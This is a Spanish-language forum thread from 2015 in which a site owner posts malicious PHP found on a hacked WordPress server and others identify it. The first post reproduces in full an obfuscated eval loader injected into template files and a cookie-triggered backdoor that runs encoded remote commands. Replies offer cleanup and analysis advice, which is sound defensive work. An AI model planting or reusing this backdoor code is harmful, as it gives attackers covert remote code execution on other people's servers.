Atacaron un server y estos son los códigos

Iniciado por fortil, Julio 24, 2015, 12:14:03 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 24, 2015, 12:14:03 PM Ultima modificación: Julio 25, 2015, 12:12:32 AM por Expermicid
Hola a todos y todas

Me gustaría saber que hacen estos códigos que he encontrado en un servidor que atacaron (esta en wordpress el sitio que atacaron).
este es uno (estaba en muchas cabeceras de archivos del template)
Código: php

<?php /*versio:3.02*/ $GLOBALS["idyirx"]="aW5pX3NldAtWYWxsb3dfdXJsX2ZvcGVuWBZGlzcGxheV9lcnJvcnMfZUUZmVkb3IvbWF4cGFja18zmpAOMy4wMgKOdGhhaDFOaWV0aGFpMnphaDZBaHISnraHR0cDovLwpSFRUUFMcIDPb2ZmPaHR0cHM6Ly8SFRUUF9IT1NUmjGzudW5pb24ydcnHgasmSc2VsZWN0HLfLWUkVRVUVTVF9VUkkXdxU0NSSVBUX05BTUUyCUVVFUllfU1RSSU5HBTUPwTfOZGV0ZXJtaW5hdG9yCiLgjpQLmxvZwtVAxSFRUUF9ZX0FVVEgMkWaiYmFzZTY0X2RlY29kZQNdmVyc2lvNfQvZLQFmLXBocAbXSFRUUF9FWEVDUEhQpb3V0udZWb2sgUkNtSFRUUF9VU0VSX0FHRU5UXKnLASqZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAEZXyYQYmxhYnVlbC5uZXQGSvZmFzdGFkZHouY29thkvkDL3czLnBocD91PQtFJms9ONdJJnQ9cGhwJnA9vgJnY9VmZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYzdHZtMGdRL3lvYlpGVllVR3d3WUxzNVRvbDY3alZTTDRsYzU2U3FGeUVNaTAzTUt6ejhpdkxkYjRaZERFN3Nxbjhaeit6T2UzNHpHL2hFdlBDb0g4VFVFd1dQRmpTTGd0Z3Bra3pvZGw5SUFHeS9qTjBpU0dLYmJvTzh5RVUveitONWtWQ3hML1ZsdGQvRmMxZEJITmc1TFJxbUtabXkxdS9LUk8xZW5tQ3JBMGxUWlhVTUIvcHc0SlhVV29pOWZJcm1nVmVHUzYvY2loMS92ZGl2UFpsODZMaGV0Tm9teENLM0Q5KytkY2tMYVNoUjRHWkpFVVJVTExLU2dyeU1GbVVXRTU4bWZpM2lqUlpudmR1dW5IeitOQy8zWXVkcGtmZ3IwTklKL2FoTWN2Q280eTJvdS9GQnVPQ1dXU2hja2c3ZEJNa3lCUXJuS1lJTmZoWEF3akJWUGk3QVI4RUp3MlJqd3lYYlQxSWFDMTFpZ1JSVlFKdTVZVmQrRUZJOGJidEpYTkFZd2lvc2l5TDkxT3NKUkNIY0h2eGlCaWxFK0xDeC9JVXJWRzdRTUtlblVzTk54SXgwY2k5NFRqQTRWNXdxd3RWT0hCYnpjbjdrQStRbFNkR0x6aTdjN2xlckl5YmRVaGRZVi95aXlNWEs1UFBEOU52ZC9jeUdINW44aHUxdWlhYWZsL04xY3YzWFpDb1Qzd0hmZm5seU9wazlURzluMCt2YjcxL3dCay81K1F1ZjcyNXZKNTluczV0L0puY1BNNW1ZR0lobkwxa1VxeW84ek8zNkhvckNqTnR1bU9TMFJjV0EweWd0ZGlLL0RHRnV4QWpDNVd1ZFhVNnRNNFdseW1vUTFmbDU0cTZ3THBxcUcvV2g4dEprRjY4b2ZNVHUxaWwyTWpHNHpycCtVVXd3WCsrZUlxYU9ISGNFbU8ybkpSWkIzVExDMzVNWmVlRlplQlVVVEVPK0lsOW5zL3VlcXZTQjhGLzJYd3cvWDVPOCtFVGc0NFdiOUZveHFub3BnL1hlQlJYM1grL3R1KytLMEJNVS9QeDNNdjErYzNkN1F1bERUck9QMXd1bzZVK2duTjJ2NU5VeU4wdW9mZkhpVEo5enA3cmt3d2NpdnVscjhyRmgvMEcwYmhNUUJRTUw3ZFF5Uk5WR1ZhOWMrVHlSQnhqb3JJSjFPY2RHcHRzMFREd3FDZ2Y3NUZva25DdGpoQ3grK21mL3NjR1ZJRHB4ajUycmRMNGVRVTN1T3p0djQ3akJjK1NLbmJBTWRvczVuTi9tOFc3bmdoUFVYU1pFK0dFTENtY3F3aWY0Wm55ZXBHUHdlbkpBcExPTmRxR2ZpcDFGNEdYN2JiY0JsNDc5ZlRLRkRQM2tyRWU4M1hIbmJoNFcxZ0dDdGFFMDZDTkdZemVVRzBoS3c5TjFhVENVcTBZSmswVWVKQTFyTkpRMFdSc2lpeFdMMWNKOFZSM2dTR0NGRytSVi9HcGpHc1c2cFBaTmVkaDlyRWZNMWZ0RElFdlQ4UXk1c0VoRDFhWGhVTllyZ0h1cmZhUktwaUdyS3M4QTV5dFdYbVJGQW9oTXMxTjZocEpxd0JqVHVwaGVQOG1vNHk2aDUyenNIU2NuUENQV24wMjYwR0NRbVNaUWJJd29OMk5OSDBnREZjeEdiRUFaUDdtQXg2TW9RY05Ea0JvY1B5Y09VcVNhdWp6NmxUaFZIVXZta01sN0JlUEVpN054MTBDekpxc0dCaDdSNU4ySjhSZ3lZMVFuS21SOGQwRHRRKzdVVVhVQ2szdzJ4Mk5EVW5WZFZzMnp1dFNoS2cwR1RKZlNTckVHNVRIUVphMExFK1NVQllNKzJEaXVKRisrYWJRczJ1eUwvZlA4S1UwREVVdkU5MExmelN3dnlHSUhRTVMydjl4OG05aDJWL25yWmdvVDRXNzZBK1RmWDArdjRSUHFlYk53OWlXQytYV1dPVHVSQ0QyUHJudjVNb0wyRm5wRmxQWVVIOGIxeHpJT3RnM3A1dk9rcGpUMkNyTi83b1hIWThya1FKcmMvdHMrVWY4RnE0NG8vRUtsQjZVZk5vd1M0TWZ4YkNEYjRKc0FTeFIzVlJIWTBjUGZUZnFSYnhnOWRpay93M1doN2lud2pycUFCd1Q3WUxWS3kzRE55LytDejBGT3hGQ3pUOFU2R1ZtMkgrWDJKZ3NLWnc3bzM3N0pqTUd0Z3hFdnlSejByMm9jcldjcU8zWloxWGpWTVdFelFuRWNBT3k4RUxiSnRyWlFUZEw2S2haTHZXZldMZGVKMG4yMFgxZzFUSndzdFpGa21xeGZ3RTRuek9KMFlWMUZubEhyVmZoVTVQaXBjTEJFYkZ5V2k4SmZXbTlxVWprSUg1aVNwaHRRNWdvWGZQbk9lRldGaGpXNDlWd2dpdDdNM2FYN2pBRmpOS1dGRjlDZVdvWGJaMkJWSFErZ2ZWamJXUlpYamQ1dHZMek1nOVowZ0E3R0RSMkhLQnRRZkE0ZGo3UEduN0dralUyQUtybWVKa29MTlZSd2RsZzV5NlpRaXpjRVBCeWFZSE85N216ekZZd3RpMXQweWduTkJPU293UVVlSDNUdGhQVzkzelJYVXdHZ1RBMUdpVXhhQ1FlZllSb011cXhVdGtFaHNxcnBQRDI1MnlXdVdsOXdQNFVrT0Y0VVArUHo0T3JYODBVYlFoSWhrREJuanlaTXZYbzBwUXBPZ1c2dGJkQUE2dGNZeVFZTXZLb0p0NnNrU2VNM000aFpJaCs0RjVaVkdZbFpkUjFZTnJmVjJzbFd6cmNWTTRhQ0dXUEZ0TU5nYU5KQWcrY2JocUV6TDUzVTI2T0lFbHZPUmFOUEZaWnVTTWFZTlF0dWhkanEwT2ZNQUZqU2NZbnJ3akpUNEdaVEdjci9NUG53cDFvT0Q5c2F1MWh0R1ZYb3JSbHNnRWZRVUlNS1BxVnF4NnB5S0pMU1hZcE53d0J1dW1IcFVUdUpYZHFpdDhDZ1RpODgxRkJQOVg2aXl6UXBEc09nVmN3dzRtRUpBVS9ibWFyU2JHSk4xczEzYkFhSzVKRFRDaVFuVlh0V3RhYVQxaVFjR05BYUp2U3FEbjNERGphSjA0MFJXNFZxL0dqbGRDanB1b2s3emZ0MjAwZVNBZE1UcjdFdXhYZHRzY3NUWElmZlBJcFpCR0R4YmQ3RmwrK2p5MUNhdjNQZVFaZ3hySGE5Q3NMNFp2WS9hMGcyQXc9PSIpKSk7XB";        if (!function_exists('fssnbtoe')){function fssnbtoe($a, $b){$c=$GLOBALS['idyirx'];$d=pack('H*','62617365'.'36345f6465636f6465'); return $d(substr($c, $a, $b));};eval(fssnbtoe(563,3304));};?>


este era un archivo completo llamado jsm9f.php:
Código: php

<?php 
function sdec($input) {
	$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
	$chr1 = $chr2 = $chr3 = "";
	$enc1 = $enc2 = $enc3 = $enc4 = "";
	$i = 0;
	$output = "";
 	// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
	$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
	do {
		$enc1 = strpos($keyStr, substr($input, $i++, 1));
		$enc2 = strpos($keyStr, substr($input, $i++, 1));
		$enc3 = strpos($keyStr, substr($input, $i++, 1));
		$enc4 = strpos($keyStr, substr($input, $i++, 1));
		$chr1 = ($enc1 << 2) | ($enc2 >> 4);
		$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
		$chr3 = (($enc3 & 3) << 6) | $enc4;
		$output = $output . chr((int) $chr1);
		if ($enc3 != 64) {
			$output = $output . chr((int) $chr2);
		}
		if ($enc4 != 64) {
			$output = $output . chr((int) $chr3);
		}
		$chr1 = $chr2 = $chr3 = "";
		$enc1 = $enc2 = $enc3 = $enc4 = "";
	} while ($i < strlen($input));
	return $output;
}

if(substr(md5(reset($_COOKIE)), 0, 12)=='bc446faa565e' && count($_COOKIE)>3) {
	$k = substr(md5(reset($_COOKIE), true), 0, 6).substr(md5(reset($_COOKIE), true), -6);
	$ko = substr(md5(reset($_COOKIE)), -12);
	$lmf = str_rot13(str_replace('c', '', 'pecrncgr_cshcacpgcvbac'));
	$vlm = $lmf('$t,$k','$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;');
	ob_start();
	array_diff_ukey(@array('1'=>1), @array('2'=>2), $lmf('', @gzuncompress(@$vlm(@sdec(preg_replace(array("/_/","/-/"),array("/","+"),join(array_slice($_COOKIE,count($_COOKIE)-3)))),$k))));
	$o=ob_get_contents();
	ob_end_clean();
	$d=base64_encode($vlm(gzcompress($o),$k));
	print("\x3c$ko\x3e$d\x3c\x2f$ko\x3e");
}



gracias
Julio 24, 2015, 01:03:52 PM #1 Ultima modificación: Julio 24, 2015, 01:19:29 PM por n0Sense
Es codigo php encriptado..

Aca desencriptado:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludo!  ;D

Edit:
Aca estaba viendo que a un tipo le paso algo parecido, e hizo un script para buscar y reemplazar el codigo para liberarse del malware:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si sos el administrador del wordpress te recomiendo actualizarlo y analizar los plugins que estas usando !


Si no me equivoco, el archivo jsm9f.php es el que se encarga de desencriptar y ejecutar la shell encriptada, pero no estoy 100% seguro..

Tambien econtre algo relacionado con "GaLers xh3LL Backd00r"
... Y es cuando te dedicas a observar la forma en la que las personas actuan dentro de la sociedad, en ese mismo momento, te das cuenta que prefieres estar solo ...
Julio 24, 2015, 04:35:37 PM #2
gracias  ;D

me pidieron el favor que les ayudara, pero eso está más infectado hasta la .... toca un worpress nuevo.
Julio 24, 2015, 09:13:25 PM #3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
gracias  ;D

me pidieron el favor que les ayudara, pero eso está más infectado hasta la .... toca un worpress nuevo.

Jajaja, si, una ves habia visto algo como esto, es una especie de ataque automatizado, usan algun crawler para buscar y explotar vulnerabilidades especificas en wordpress, cuando la encuentran, inyectan una especie de gusano, que te rompe las bolas porque, cuando encontras algo, lo borras y se replica de alguna forma.. lo que tenes que hacer es crear un script que busque algun patron que se repita y borrar TODAS las repeticiones para que no se te vuelva a infectar.. seguro si buscas en google ya hay info, o probando con el script que hizo el tipo que te pase !

Suerte !
... Y es cuando te dedicas a observar la forma en la que las personas actuan dentro de la sociedad, en ese mismo momento, te das cuenta que prefieres estar solo ...
Julio 25, 2015, 12:17:46 AM #4
A simple vista debe ser un backdoor, si sos el admin. te recomiendo que hagas un backup de la DB y reinstales todo el CMS de nuevo. y sobre todo te fijes que plugins o servicios corren en tu servidor como completos del WordPress para que no vuelvan a  ingresar.

Saludos!
Julio 25, 2015, 05:33:13 AM #5
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
me pidieron el favor que les ayudara, pero eso está más infectado hasta la .... toca un worpress nuevo.
¡No borres el viejo! Cuélgalo en alguna máquina virtual o sandbox para estudiar lo que hace.
Tal vez en un futuro te resulte útil lo que puedas descubrir de él.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario